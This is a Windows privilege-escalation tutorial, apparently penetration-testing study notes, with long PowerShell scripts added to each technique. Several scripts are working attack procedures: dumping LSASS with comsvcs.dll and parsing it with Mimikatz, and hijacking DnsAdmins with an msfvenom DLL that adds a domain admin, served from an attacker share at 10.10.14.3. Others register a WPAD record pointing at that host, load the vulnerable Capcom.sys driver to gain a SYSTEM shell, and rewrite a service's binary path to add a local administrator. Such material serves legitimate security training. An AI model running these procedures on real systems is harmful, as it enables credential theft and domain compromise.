Windows Privilege Escalation (TBC)
Introduction
Elevating privileges on a Windows system is a crucial step after gaining initial access. By moving from a low-privilege account to one with administrative rights or even SYSTEM-level access, you open the door to persistence, deeper network reconnaissance, and further lateral movement.
The general goal of Windows privilege escalation is to gain the rights of the local Administrators group or of the NT AUTHORITY\SYSTEM (LocalSystem) account.
While there are many tools available, it’s always important to understand what they do and how to manually verify their output. Tools can provide a huge amount of data. While they speed up the process, take time to interpret the output to avoid information overload. Examples of the tools we can use:
Seatbelt
winPEAS
PowerUp/SharpUp (C# version of PowerUp)
JAWS
SessionGopher
Watson
LaZagne
Windows Exploit Suggester - Next Generation
Sysinternals Suite
Initial Enumeration
Begin your assessment by collecting key system details:
Operating System & Version: Identify whether you’re dealing with a workstation or server (e.g., Windows 7, Windows 10, Server 2008, 2012, 2016, 2019, etc.). Knowing the OS type and version can guide your choice of tools and hint towards potential public exploits.
Running Services: Investigate services, especially those running as NT AUTHORITY\SYSTEM or with administrative privileges. Misconfigured or vulnerable services can be prime targets.
Environment Variables: Use the set command to print the current environment variables. These can reveal configuration details (paths, proxy settings, user names) and potential weaknesses.
Installed Programs & Running Processes: Processes running on the system, even if not running as an administrator, might hold tokens that can be abused for privilege escalation.
Named Pipes
Named pipes are a common method for inter-process communication. Since they reside in memory, their permissions and usage can offer clues for further escalation:
Pipes can be listed with the Sysinternals Suite or directly from PowerShell. After listing them, check the DACL of specific pipes (for example, the LSASS pipe): a pipe served by a privileged process that a low-privileged user can write to is a candidate for impersonation or for feeding that process malicious input.
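The enumeration described above, as an added example that is not part of the original page. It lists the NPFS namespace with .NET and then hands an individual pipe to Sysinternals accesschk for its DACL; accesschk.exe on PATH and the keyword list used to pick "interesting" pipes are assumptions.

```powershell
# Added example: enumerate named pipes, then inspect the DACL of interesting ones.
# Assumes Sysinternals accesschk.exe is on PATH; the listing itself needs only .NET.

function Get-NamedPipe {
    # NPFS exposes open pipes as a pseudo-directory; GetFiles enumerates every one of them
    [System.IO.Directory]::GetFiles('\\.\pipe\') |
        ForEach-Object { $_ -replace '^\\\\\.\\pipe\\', '' }
}

function Get-NamedPipeAccess {
    param([Parameter(Mandatory)][string]$Name)
    # accesschk addresses NPFS as \pipe\<name>; -w lists principals with write access, -v prints the rights
    & accesschk.exe -accepteula -nobanner -w -v "\pipe\$Name" 2>&1
}

# Assumed keyword list: pipes whose names suggest a privileged owner or a third-party agent
$pattern = 'lsass|spoolss|srvsvc|svcctl|winreg|sql|splunk|veeam|backup'

$all = Get-NamedPipe
"$($all.Count) pipes open"
$interesting = $all | Where-Object { $_ -match $pattern }
$interesting

# The page's example: who can write to the LSASS pipe?
Get-NamedPipeAccess -Name lsass

# Any pipe that 'Everyone' or 'Authenticated Users' can write to deserves a look at the serving process
foreach ($p in $interesting) {
    $out = Get-NamedPipeAccess -Name $p
    if ($out -match 'Everyone|Authenticated Users') { "writable by low-priv users: $p" }
}
```

Pipes that appear only while a privileged process is running will be missed by a single snapshot; re-run the listing after triggering the services you care about.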
Network & System Information
Another essential thing is understanding your target environment. Start by gathering basic network and system details:
Network Configuration:
ipconfig /all
arp -a
route print
Security Services: Check whether Microsoft Defender is active (and which exclusions it has) and whether AppLocker is enforcing rules, so you know what you can and cannot run before dropping tools on disk.
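The Defender and AppLocker checks above, as an added example (not code from the original page). It uses the built-in Defender and AppLocker cmdlets, so it needs no uploads; the binary tested at the end is an assumed placeholder.

```powershell
# Added example: what will stop a tool from running or get it quarantined?

function Get-DefenderState {
    # Get-MpComputerStatus ships with the Defender module; it is absent where Defender is not installed
    $s = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if (-not $s) { return [pscustomobject]@{ Present = $false } }
    [pscustomobject]@{
        Present          = $true
        AntivirusEnabled = $s.AntivirusEnabled
        RealTime         = $s.RealTimeProtectionEnabled
        AMService        = $s.AMServiceEnabled
        TamperProtection = $s.IsTamperProtected
        SignaturesAge    = $s.AntivirusSignatureLastUpdated
        # Exclusions are the cheapest way to stage tools: anything under these paths is not scanned
        ExcludedPaths    = (Get-MpPreference -ErrorAction SilentlyContinue).ExclusionPath
    }
}

function Get-AppLockerRules {
    # -Effective merges local and GPO policy; no output means AppLocker is not configured
    $pol = Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue
    if (-not $pol) { return }
    foreach ($c in $pol.RuleCollections) {
        foreach ($r in $c) {
            [pscustomobject]@{
                Collection = $c.RuleCollectionType   # Exe, Dll, Script, Msi, Appx
                Mode       = $c.EnforcementMode      # Enabled (enforced), AuditOnly, NotConfigured
                Rule       = $r.Name
                Action     = $r.Action
            }
        }
    }
}

function Test-AppLockerAllows {
    # Ask the policy engine directly rather than reasoning about rules by hand
    param([Parameter(Mandatory)][string]$Path, [string]$User = 'Everyone')
    Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path $Path -User $User
}

Get-DefenderState | Format-List
Get-AppLockerRules | Format-Table -AutoSize
# Assumed binary: where would a dropped tool be allowed to execute?
Test-AppLockerAllows -Path 'C:\Users\Public\tool.exe'
```

An AppLocker collection in AuditOnly mode logs but does not block; a Defender exclusion path is also the first place to look for tools other operators already left behind.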
Gathering User & Group Information
Collecting detailed user and group data helps in mapping out the system’s security posture. Useful commands include:
Processes & Environment:
Hotfixes:
CMD:
wmic qfe
PowerShell:
Get-HotFix | ft -AutoSize
Installed Programs:
CMD:
wmic product get name
PowerShell:
Get-WmiObject -Class Win32_Product | select Name, Version
Note that both of these query the Win32_Product class, which triggers a consistency check (and possibly a repair) of every MSI package on the host: it is slow and noisy. Reading the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion (and the WOW6432Node equivalent) gives the same list quietly.
Network Services & User Details:
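User, group and listening-service enumeration in one pass, as an added example that is not part of the original page. It relies only on built-in cmdlets and classic tools; the filter that singles out "non-Windows" SYSTEM services is an assumed heuristic.

```powershell
# Added example: who is here, who is an admin, what listens, and what runs as SYSTEM.

function Get-LocalAdminMembers {
    # Get-LocalGroupMember throws on orphaned domain SIDs; net localgroup is the robust fallback
    try   { Get-LocalGroupMember -Group Administrators -ErrorAction Stop | Select-Object Name, ObjectClass, PrincipalSource }
    catch { net.exe localgroup Administrators }
}

function Get-LoggedOnSessions {
    # Other interactive sessions (console/RDP) mean other users' processes, and therefore other tokens, on the box
    query.exe user 2>$null
}

function Get-ListeningPorts {
    # Map listening TCP ports to their owning process; loopback-only services are reachable solely from the host
    Get-NetTCPConnection -State Listen | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Address   = $_.LocalAddress
            Port      = $_.LocalPort
            PID       = $_.OwningProcess
            Process   = $proc.ProcessName
            LocalOnly = ($_.LocalAddress -in '127.0.0.1', '::1')
        }
    } | Sort-Object Port
}

function Get-SystemServicesOutsideWindows {
    # Assumed heuristic: LocalSystem services whose binary is not under C:\Windows are third-party and worth checking
    # (unquoted paths, weak binary/directory ACLs, service DACLs) with the techniques later on this page
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -match 'LocalSystem' -and $_.PathName -notmatch '^"?C:\\Windows' } |
        Select-Object Name, State, StartMode, StartName, PathName
}

whoami.exe /all
Get-LocalAdminMembers | Format-Table -AutoSize
Get-LoggedOnSessions
Get-ListeningPorts | Format-Table -AutoSize
Get-SystemServicesOutsideWindows | Format-Table -Wrap
```

whoami /all also prints the token's privileges, which is the input to the Windows Privileges section below.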
Windows Privileges
Privileges in Windows define what actions an account can perform. Every security principal (users, computers, processes) is identified by a unique SID.
Every process in Windows runs with an access token that details the security context of the process. These tokens, although stored in memory, can sometimes be exploited, especially if they have privileges like SeImpersonate.
Some privileges are assigned to the token but disabled by default. They still count: any process holding a privilege can re-enable it with AdjustTokenPrivileges, which is exactly what the publicly available PowerShell scripts and PoCs for this do. A privilege shown as Disabled is therefore not a blocker, only an extra step.
SeImpersonate & SeAssignPrimaryToken
The SeImpersonate privilege allows a process to impersonate the security context of a client that has authenticated to it; SeAssignPrimaryToken allows assigning such a token to a new process. Both are commonly held by service accounts (IIS application pools, MSSQL, and similar). The "Potato" family of techniques coerces a SYSTEM process into authenticating to a listener the attacker controls and then impersonates the resulting token to run commands as SYSTEM.
Common Tools:
JuicyPotato (relies on DCOM/BITS activation; does not work on Windows Server 2019 / Windows 10 1809 and later)
PrintSpoofer (abuses the Print Spooler service; works on those newer builds as long as the spooler is running)
SeDebugPrivilege
The SeDebugPrivilege lets a user attach to and read the memory of any process, including LSASS, which holds credential material for every logged-on session. Local administrators hold it by default, but other accounts can receive it through policy.
Memory Dumping: use ProcDump from the Sysinternals Suite to write a full memory dump of lsass.exe to disk.
Extracting Credentials with Mimikatz: load the dump in Mimikatz and extract the logon session secrets (NTLM hashes, Kerberos keys, and plaintext passwords where WDigest caching is enabled). Parsing the dump offline avoids running Mimikatz on the target at all.
In cases where tool uploads are limited, you can use RDP and Task Manager (Details tab, right-click lsass.exe, Create dump file) to generate the dump through the GUI.
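The dump-and-parse workflow above, as an added example that is not part of the original page. C:\Tools as the staging directory, C:\Temp as the output directory, and an elevated shell holding SeDebugPrivilege are assumptions; every step here is signatured by Defender.

```powershell
# Added example: three ways to obtain an LSASS minidump, a header sanity check, and the Mimikatz parse.
$dump  = 'C:\Temp\lsass.dmp'          # assumed output path
$lsass = Get-Process -Name lsass      # the LOLBin route needs the PID

# 1. Sysinternals ProcDump: -ma writes a full memory dump (a mini dump lacks the credential pages)
& C:\Tools\procdump.exe -accepteula -ma $lsass.Id $dump

# 2. No uploads possible: comsvcs.dll exports MiniDump and is Microsoft-signed. Run through cmd so the
#    "dll, export" syntax reaches rundll32 intact (PowerShell would otherwise split on the comma).
# cmd.exe /c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $($lsass.Id) $dump full"

# 3. GUI fallback over RDP: Task Manager > Details > lsass.exe > Create dump file (lands in %TEMP%)

function Test-MinidumpHeader {
    # A truncated or AV-mangled dump parses to nothing in Mimikatz; check the MINIDUMP_HEADER signature first
    param([Parameter(Mandatory)][string]$Path)
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $buf = New-Object byte[] 4
        if ($fs.Read($buf, 0, 4) -ne 4) { return $false }
        [System.Text.Encoding]::ASCII.GetString($buf) -eq 'MDMP'   # 'MDMP' = 0x504D444D
    } finally { $fs.Dispose() }
}

if (-not (Test-MinidumpHeader $dump)) { throw "not a valid minidump: $dump" }

# 4. Parse. sekurlsa::minidump switches Mimikatz from the live LSASS to the file; logonpasswords walks the sessions.
#    Do this offline where possible; the dump is the only artefact that has to leave the host.
& C:\Tools\mimikatz.exe "sekurlsa::minidump $dump" "sekurlsa::logonpasswords" "exit"
```

Hosts with Credential Guard or LSASS running as a protected process (RunAsPPL) defeat the dump even with SeDebugPrivilege; check for those before spending the detection budget.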
SeTakeOwnershipPrivilege
This privilege allows you to take ownership of any securable object such as files, registry keys, and services. This is particularly useful if you encounter files or objects with restricted access.
Example Scenario:
Suppose you find a file cred.txt under a restricted share and lack access. First, check its details (owner and ACL); then take ownership of it; finally, as the new owner, grant yourself full access and read it.
Changing ownership and permissions can disrupt system functionality. Always ensure you have proper authorization and understand the potential impact of these actions.
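The take-ownership scenario above as an added example, not code from the original page. The file path is hypothetical; the script records what it can before changing anything so the step can be undone, which is the part most walkthroughs skip.

```powershell
# Added example: take ownership of a protected file, grant yourself access, keep enough to restore it.
$target = 'C:\Department Shares\Private\IT\cred.txt'   # assumed path
$me     = "$env:USERDOMAIN\$env:USERNAME"

function Get-OwnerAndAcl {
    # Get-Acl needs READ_CONTROL on the object; on a locked-down file that call itself fails,
    # which is precisely the symptom that brought us here
    param([Parameter(Mandatory)][string]$Path)
    try {
        $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
        [pscustomobject]@{ Owner = $acl.Owner; Access = ($acl.AccessToString -split "`n") }
    } catch {
        [pscustomobject]@{ Owner = '<access denied>'; Access = @() }
    }
}

'Before:'; Get-OwnerAndAcl $target | Format-List

# Cleanup material: /save keeps the DACL (not the owner) in a format /restore understands
icacls.exe $target /save C:\Temp\cred.acl /c
$originalOwner = (Get-OwnerAndAcl $target).Owner

# 1. SeTakeOwnershipPrivilege lets us make ourselves owner regardless of the DACL.
#    takeown enables the (normally disabled) privilege in its own token, so no separate enable step is needed.
takeown.exe /F $target

# 2. An owner can always rewrite the DACL. ${me} stops PowerShell parsing "$me:F" as a drive-qualified variable.
icacls.exe $target /grant "${me}:F"

'After:'; Get-OwnerAndAcl $target | Format-List
Get-Content -LiteralPath $target

# Cleanup (commented out): restore the DACL from the saved file; handing ownership back to another
# principal requires SeRestorePrivilege, which takeown alone does not give you.
# icacls.exe (Split-Path $target) /restore C:\Temp\cred.acl
# icacls.exe $target /setowner $originalOwner
```

The same three steps apply to registry keys (takeown does not cover them; use SubInACL or Set-Acl from an elevated shell) and to service objects, where the binPath technique under Server Operators below then becomes available.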
Privileges via Built-in Groups
Privileges in Windows aren't just assigned to individual accounts; group memberships can grant powerful rights as well. Listing the groups in your token shows which built-in groups you belong to. Below we examine several key groups that can be exploited.
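A triage pass over the current token that ties the privileges from the previous section and the groups discussed below to the technique each one unlocks. This is an added example and not the page's own tooling; the hint table is the editor's mapping of this page's sections and is an assumption, not a Windows artefact.

```powershell
# Added example: parse whoami output (CSV is far easier to handle than the aligned text table)
# and map privileges/groups to the escalation paths covered on this page.

function Get-TokenPrivilegeState {
    whoami.exe /priv /fo csv | ConvertFrom-Csv |
        ForEach-Object { [pscustomobject]@{ Name = $_.'Privilege Name'; State = $_.State } }
}

function Get-TokenGroupNames {
    (whoami.exe /groups /fo csv | ConvertFrom-Csv).'Group Name'
}

function Test-IsElevated {
    # Under UAC, an admin or Backup Operators member gets a filtered token in a normal shell:
    # the interesting privileges simply do not appear until you elevate
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Assumed mapping (editor's table, keyed to the sections of this page)
$PrivHints = @{
    'SeImpersonatePrivilege'        = 'Potato family: PrintSpoofer on 2019/1809+, JuicyPotato on older builds'
    'SeAssignPrimaryTokenPrivilege' = 'Potato family'
    'SeDebugPrivilege'              = 'dump LSASS (procdump -ma), parse with Mimikatz'
    'SeTakeOwnershipPrivilege'      = 'takeown + icacls on protected files, keys, services'
    'SeBackupPrivilege'             = 'diskshadow + robocopy /B for NTDS.dit; reg save SAM/SYSTEM'
    'SeRestorePrivilege'            = 'write into protected locations (service binaries, hives)'
    'SeLoadDriverPrivilege'         = 'load a vulnerable signed driver (Capcom.sys)'
}
$GroupHints = @{
    'BUILTIN\Backup Operators'       = 'SeBackup/SeRestore (see Backup Operators)'
    'BUILTIN\Event Log Readers'      = 'read Security log: 4688 command lines'
    'BUILTIN\Server Operators'       = 'service binPath hijack'
    'BUILTIN\Print Operators'        = 'SeLoadDriverPrivilege'
    'BUILTIN\Hyper-V Administrators' = 'clone/mount DC VHDX'
}

function Get-EscalationHints {
    foreach ($p in Get-TokenPrivilegeState) {
        if ($PrivHints.ContainsKey($p.Name)) {
            # Disabled is fine: it only needs AdjustTokenPrivileges to flip on
            [pscustomobject]@{ Source = $p.Name; State = $p.State; Hint = $PrivHints[$p.Name] }
        }
    }
    foreach ($g in Get-TokenGroupNames) {
        if ($GroupHints.ContainsKey($g)) {
            [pscustomobject]@{ Source = $g; State = 'member'; Hint = $GroupHints[$g] }
        } elseif ($g -like '*\DnsAdmins') {   # domain group, so the domain prefix varies
            [pscustomobject]@{ Source = $g; State = 'member'; Hint = 'ServerLevelPluginDll via dnscmd' }
        }
    }
}

"Elevated token: $(Test-IsElevated)"
Get-EscalationHints | Format-Table -AutoSize
```

If the elevation check is false and the group list shows an interesting group marked "Group used for deny only", re-run from an elevated shell before concluding that a privilege is missing.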
Backup Operators
Membership in this group grants the SeBackup and SeRestore privileges.
With SeBackupPrivilege, you can traverse any folder and list its contents, even when no explicit access control entry (ACE) exists for your account. However, instead of the standard copy command, you must copy files programmatically while opening them with the FILE_FLAG_BACKUP_SEMANTICS flag; a PoC named SeBackupPrivilege (a PowerShell module with a Copy-FileSeBackupPrivilege cmdlet) is available to do this. Depending on the server settings, you may need to spawn an elevated CMD prompt (to bypass UAC) before the privilege shows up in your token at all. If it is present but disabled, it can be enabled with AdjustTokenPrivileges, which the same PoC wraps.
A practical use case is attacking a Domain Controller by copying the NTDS.dit file, which contains NTLM hashes for all domain user and computer objects. Since NTDS.dit is locked and not accessible by unprivileged users, you can use the Windows diskshadow utility to create a shadow copy of the C drive (exposing it as, say, drive E:). In this shadow copy, NTDS.dit is not in use. Then, using the Copy-FileSeBackupPrivilege cmdlet, you can bypass the ACL and copy NTDS.dit locally.
It also lets you back up the SAM and SYSTEM registry hives, which can then be used with tools like Impacket's secretsdump.py to extract credentials offline. Keep in mind, however, that if a file or folder has an explicit deny entry for your user or one of your groups, this method will still be blocked.
Once you have the NTDS.dit file, you can extract Active Directory account credentials using one of two methods:
Using DSInternals:
Using secretsdump.py:
Another option is the built-in utility robocopy in backup mode (/B): unlike the standard copy command, it opens files with backup semantics and so, with SeBackupPrivilege held, copies files that your DACL would otherwise deny.
Event Log Readers
If process creation auditing is enabled, Windows logs each new process as event ID 4688 in the Security log; the command line is included only when the "Include command line in process creation events" policy is also on. Members of the Event Log Readers group can read the Security log, which may then contain passwords passed as arguments (net use, runas, sqlcmd, scheduled task creation and the like). These events can be queried with wevtutil or Get-WinEvent.
Other logs, such as the PowerShell Operational log (event ID 4104, script block logging), may also contain sensitive information.
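Querying those two logs for credential-bearing entries, as an added example that is not part of the original page. The keyword pattern is an assumed heuristic and the three sample command lines are constructed, so the filter can be exercised without a live event log.

```powershell
# Added example: hunt 4688 command lines and 4104 script blocks for credentials.

# Assumed heuristic: argument shapes that commonly carry a secret
$Pattern = '(?i)(/user:|/pass|-p\s|password|pwd=|secret|token)'

function Find-SensitiveCommandLine {
    param([string[]]$CommandLines, [string]$Regex = $Pattern)
    $CommandLines | Where-Object { $_ -and $_ -match $Regex }
}

# Constructed sample input (not real log data): the first and third lines should match
$sample = @(
    'net use T: \\FS01\backup /user:CORP\svc_backup S3cr3tP@ss!',
    'C:\Windows\System32\svchost.exe -k netsvcs -p',
    'sqlcmd -S db01 -U sa -P Winter2024!'
)
Find-SensitiveCommandLine -CommandLines $sample

function Get-ProcessCreationCommandLines {
    # Security 4688: property index 8 is CommandLine (empty unless the command-line policy is enabled)
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[8].Value }
}

function Get-ScriptBlockTexts {
    # PowerShell Operational 4104: property index 2 is ScriptBlockText
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[2].Value }
}

# Live run; both need Event Log Readers (or admin) for the Security log
Find-SensitiveCommandLine -CommandLines (Get-ProcessCreationCommandLines) | Select-Object -Unique
Find-SensitiveCommandLine -CommandLines (Get-ScriptBlockTexts) | Select-Object -Unique

# Equivalent without PowerShell cmdlets (newest first, plain text):
# wevtutil.exe qe Security /rd:true /f:text /q:"*[System[(EventID=4688)]]" | findstr.exe /i "/user:"
```

Empty 4688 command lines mean the policy is off; in that case the PowerShell Operational log and scheduled-task XML under C:\Windows\System32\Tasks are the next places to look.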
DnsAdmins
Members of the DnsAdmins group have access to DNS configuration and data across the network. Because the DNS service runs as NT AUTHORITY\SYSTEM and supports custom plugins, an attacker in this group can potentially escalate privileges, especially on Domain Controllers or dedicated DNS servers.
Steps:
DNS management operates over RPC.
The registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll can be populated with the path of a custom DLL, which the service loads without verifying the path.
Using the dnscmd utility, a DnsAdmins member can set this value remotely. Upon restarting the DNS service, the DLL is loaded as NT AUTHORITY\SYSTEM.
Example:
Generate a malicious DLL with msfvenom.
Upload the DLL to a location the DNS server can read (a local path on the DC, or a UNC share).
Set the ServerLevelPluginDll value with dnscmd.
Restarting the DNS service is required for the attack to take effect; verify first whether your account has start/stop rights on the service (DnsAdmins membership alone does not guarantee them).
Restart the service if allowed.
After the attack, remember to delete the registry value; otherwise the DC will try to load your DLL on every DNS start.
An alternative exploitation vector is to disable the global query block list and create a WPAD record; every machine running WPAD with default settings will then have its web traffic proxied through your attack machine.
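The DnsAdmins procedure above as an added example, not code from the original page. The DC name DC01, the attacker share and IP 10.10.14.3, the domain inlanefreight.local and the user netadm are assumed values; the msfvenom step runs on the attacker host.

```powershell
# Added example: ServerLevelPluginDll abuse as a DnsAdmins member, plus the WPAD alternative.
$dc  = 'DC01'                              # assumed DC name
$dll = '\\10.10.14.3\share\adduser.dll'    # UNC: the DC's SYSTEM account, not your box, must be able to open it

# On the attacker. DllMain runs the payload and never returns, so dns.exe hangs: expect a DNS outage on this DC.
# msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

# 1. Write the plugin path. dnscmd does this over RPC and only DnsAdmins/admins are allowed to.
dnscmd.exe $dc /config /serverlevelplugindll $dll

# 2. Confirm it landed (needs the Remote Registry service on the DC)
reg.exe query "\\$dc\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll

function Test-CanRestartDns {
    # Parse the service DACL: an ACE with SERVICE_START (0x10, RP) and SERVICE_STOP (0x20, WP) for a SID you hold
    param([Parameter(Mandatory)][string]$Computer)
    $sddl = sc.exe "\\$Computer" sdshow DNS | Where-Object { $_ -match '^D:' }
    $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if (($ace.AccessMask -band 0x30) -eq 0x30) {
            [pscustomobject]@{ Sid = $ace.SecurityIdentifier; Mask = ('0x{0:X}' -f $ace.AccessMask) }
        }
    }
}
# 3. Compare the SIDs below with your own (whoami /groups) before relying on a restart
Test-CanRestartDns -Computer $dc

# 4. Restart: the DLL loads during service start, as SYSTEM on the DC
sc.exe "\\$dc" stop dns
sc.exe "\\$dc" start dns

# 5. Cleanup once the payload has run (by now you are Domain Admin, so the remote registry write succeeds)
reg.exe delete "\\$dc\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /f
sc.exe "\\$dc" start dns

# Alternative: WPAD. The global query block list exists to stop wpad/isatap resolution; clear it, then
# register wpad pointing at the attacker. Clients with default WPAD settings proxy through 10.10.14.3.
dnscmd.exe $dc /config /globalqueryblocklist
dnscmd.exe $dc /recordadd inlanefreight.local wpad A 10.10.14.3
```

In PowerShell, sc on its own resolves to the Set-Content alias; always call sc.exe. The WPAD route needs a listener (Responder or a proxy) on the attacker side and leaves the DNS service running, which makes it quieter than the plugin DLL.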
Hyper-V Administrators
The Hyper-V Administrators group has full access to Hyper-V features. In environments where Domain Controllers are virtualized, administrators in this group could effectively gain Domain Admin privileges. They can clone live Domain Controllers and mount the virtual disk offline to extract the NTDS.dit file, thus retrieving NTLM hashes for all domain users.
Additionally, when a virtual machine is deleted, the vmms.exe process, running as NT AUTHORITY\SYSTEM, restores the original permissions on the corresponding .vhdx file path. By deleting the .vhdx file and replacing it with a hard link to a protected system file, you end up with full permissions on that file once vmms.exe has "restored" them, which can then be used, for example, to overwrite a service binary that runs as SYSTEM. Note, however, that this vector has been mitigated by the March 2020 Windows security updates.
Print Operators
The Print Operators group is highly privileged. Its members can manage, create, share and delete printers connected to a Domain Controller, log on to it locally and even shut it down; critically, they are also granted SeLoadDriverPrivilege, which allows loading a kernel driver. Make sure to check for the privilege in an elevated session: you might need to bypass UAC (for instance, using techniques from the UACMe repository) or open an elevated command shell using the credentials of a Print Operators member, because the filtered token of a normal shell does not show it.
The signed but vulnerable driver Capcom.sys is well known for letting any user who can open its device execute arbitrary code in kernel mode, from which a SYSTEM shell is trivial. You can exploit this with the PoC EnableSeLoadDriverPrivilege.cpp, which enables the privilege in its own token and calls NtLoadDriver. First, compile the PoC.
Then download the Capcom.sys driver (saving it to, for example, C:\Tools\Capcom.sys) and add a reference to it under your HKEY_CURRENT_USER tree: NtLoadDriver accepts a registry path under \Registry\User\<SID>, so the ImagePath and Type values can live in a key you control rather than under HKLM.
Verify that the driver is loaded; drivers loaded this way are not registered with the Service Control Manager, so driverquery and Get-Service will not list them.
Finally, run a PoC such as ExploitCapcom to trigger a SYSTEM shell. If GUI access isn't available, modify the PoC to, for example, yield a reverse shell.
Tools like EoPLoadDriver automate this entire process, leaving you only ExploitCapcom to run. Bear in mind that current Windows builds ship Microsoft's vulnerable driver blocklist, which includes Capcom.sys, so on patched hosts with the blocklist enforced the load will be refused.
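The driver-loading steps above as an added example that is not part of the original page. The paths under C:\Tools are assumptions; the load itself is done by the EnableSeLoadDriverPrivilege PoC, and the verification uses EnumDeviceDrivers directly instead of DriverView, because SCM-based tools cannot see a driver loaded through an HKCU path.

```powershell
# Added example: register Capcom.sys under HKCU, load it via the PoC, verify it is resident.
# Assumes an elevated shell as a Print Operators member, Capcom.sys at C:\Tools\Capcom.sys and the PoC
# compiled to C:\Tools\EnableSeLoadDriverPrivilege.exe, e.g. from a VS developer prompt with:
#   cl.exe /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
$drv = 'C:\Tools\Capcom.sys'

# NtLoadDriver takes \Registry\User\<SID>\System\CurrentControlSet\CAPCOM, i.e. this HKCU key.
# ImagePath is in NT object-path form (\??\C:\...); Type 1 = SERVICE_KERNEL_DRIVER.
reg.exe add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ    /d "\??\$drv" /f
reg.exe add HKCU\System\CurrentControlSet\CAPCOM /v Type      /t REG_DWORD /d 1          /f

# The PoC enables SeLoadDriverPrivilege in its own token and calls NtLoadDriver on that key
& C:\Tools\EnableSeLoadDriverPrivilege.exe

# Verify through psapi: EnumDeviceDrivers returns the image bases of every loaded kernel module
Add-Type -Namespace Win32 -Name Psapi -MemberDefinition @'
[DllImport("psapi.dll", SetLastError=true)]
public static extern bool EnumDeviceDrivers([Out] IntPtr[] imageBases, uint cb, out uint needed);
[DllImport("psapi.dll", CharSet=CharSet.Unicode)]
public static extern uint GetDeviceDriverBaseName(IntPtr imageBase, System.Text.StringBuilder name, uint size);
'@

function Get-LoadedDriverName {
    [uint32]$needed = 0
    [void][Win32.Psapi]::EnumDeviceDrivers($null, 0, [ref]$needed)            # size query, bytes
    $bases = New-Object IntPtr[] ([int]($needed / [IntPtr]::Size))
    [void][Win32.Psapi]::EnumDeviceDrivers($bases, $needed, [ref]$needed)
    foreach ($b in $bases) {
        $sb = New-Object System.Text.StringBuilder 260
        if ([Win32.Psapi]::GetDeviceDriverBaseName($b, $sb, $sb.Capacity) -gt 0) { $sb.ToString() }
    }
}

$loaded = Get-LoadedDriverName | Where-Object { $_ -like '*capcom*' }
if ($loaded) { "loaded: $loaded" } else { 'Capcom.sys is not resident: load failed (blocklist, HVCI, or missing privilege)' }

# Next step, outside this script: C:\Tools\ExploitCapcom.exe spawns a SYSTEM cmd.exe; swap its payload
# for a reverse shell when there is no GUI. Remove the HKCU key afterwards.
```

A refused load with the privilege present usually means HVCI or the Microsoft vulnerable driver blocklist is active, which the enumeration above distinguishes from a silent PoC failure.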
Server Operators
The Server Operators group allows its members to administer Windows servers (including Domain Controllers) without needing full Domain Admin privileges. Membership confers not only SeBackup and SeRestore privileges but also control over local services.
Example Scenario: Examine the AppReadiness service and confirm that it runs as LocalSystem by querying its configuration.
As a Server Operators member you can change the service's binary path to a command that adds your current user to the local Administrators group.
Then attempt to start the service. The start fails (as expected, since cmd.exe never reports back to the Service Control Manager and is killed after the timeout), but by then the command has already run as SYSTEM: checking the Administrators group membership shows your user has been added. Log on again to get a token that carries the new group.
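The binPath hijack above as an added example that is not part of the original page. It targets the AppReadiness service named in the text, records the original configuration before changing it and puts it back afterwards; the elevated shell and the use of the current user name are assumptions.

```powershell
# Added example: service binary path hijack as a Server Operators member.
# In PowerShell, sc alone is the Set-Content alias: always call sc.exe explicitly.
$svc = 'AppReadiness'
$me  = $env:USERNAME

# 1. Confirm the account the service runs as and keep the original path for cleanup
sc.exe qc $svc
$orig = (Get-CimInstance Win32_Service -Filter "Name='$svc'").PathName
"Original binPath: $orig"

function Test-CanConfigureService {
    # SERVICE_CHANGE_CONFIG is 0x2 (DC in SDDL); Server Operators get it on most services on a DC
    param([Parameter(Mandatory)][string]$Name)
    $sddl = sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }
    $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if (($ace.AccessMask -band 0x2) -eq 0x2) { $ace.SecurityIdentifier.Value }
    }
}
"SIDs allowed to reconfigure ${svc}:"; Test-CanConfigureService -Name $svc

# 2. Point binPath at our command. The space after 'binPath=' is mandatory for sc.exe;
#    the quotes hand the whole command over as one argument.
sc.exe config $svc binPath= "cmd /c net localgroup Administrators $me /add"

# 3. Start it. cmd.exe never calls StartServiceCtrlDispatcher, so the SCM reports error 1053 after
#    the timeout and kills it, but the command has already executed as LocalSystem by then.
sc.exe start $svc

# 4. Verify. The new membership appears in a fresh logon token, not in the current shell's whoami /groups.
net.exe localgroup Administrators

# 5. Restore the service so it keeps working for everyone else
sc.exe config $svc binPath= $orig
```

Pick a service that is stopped and not relied upon, as the text does; hijacking a running service takes it down for the duration and the failed start is logged as event 7000/7009 in the System log.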
